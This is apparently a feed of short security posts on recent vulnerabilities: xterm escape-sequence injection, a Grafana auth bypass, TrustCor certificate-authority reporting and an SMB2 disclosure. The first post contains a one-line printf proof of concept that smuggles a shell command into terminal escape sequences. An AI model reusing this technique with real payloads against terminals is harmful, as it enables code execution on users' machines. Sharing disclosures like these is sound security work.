Terminal emulation bugs are the best: https://www.openwall.com/lists/oss-security/2022/11/10/1
printf "\e]50;i\$(touch /tmp/hack-like-its-1999)\a\e]50;?\a" > cve-2022-45063
home > posts
Yesterday's Grafana authentication bypass vulnerability (CVE-2022-39328) is really neat from the perspective of auditing Go code. Concurrent requests could accidentally share the same array slice of middleware handlers. Advisory at https://grafana.com/blog/2022/11/08/security-release-new-versions-of-grafana-with-critical-and-moderate-fixes-for-cve-2022-39328-cve-2022-39307-and-cve-2022-39306/ and actual patch diff at https://github.com/grafana/grafana/pull/58458/files
Some scary reporting from @joesephmenn@twitter.com via The Post: One of the powerful root certificate authorities trusted by big web browsers to vouch for websites operates from a UPS Store address and has ties to a U.S. intelligence contractor selling interception gear: https://www.washingtonpost.com/technology/2022/11/08/trustcor-internet-addresses-government-connections/ #TrustCor #TLS
some (lol) 0-day for fun; we accidentally dropped some big bugs in https://www.runzero.com/blog/smb2-sessions/ .. 2 years - but apple is now patching it, so it's ok (and don't mind samba or windows)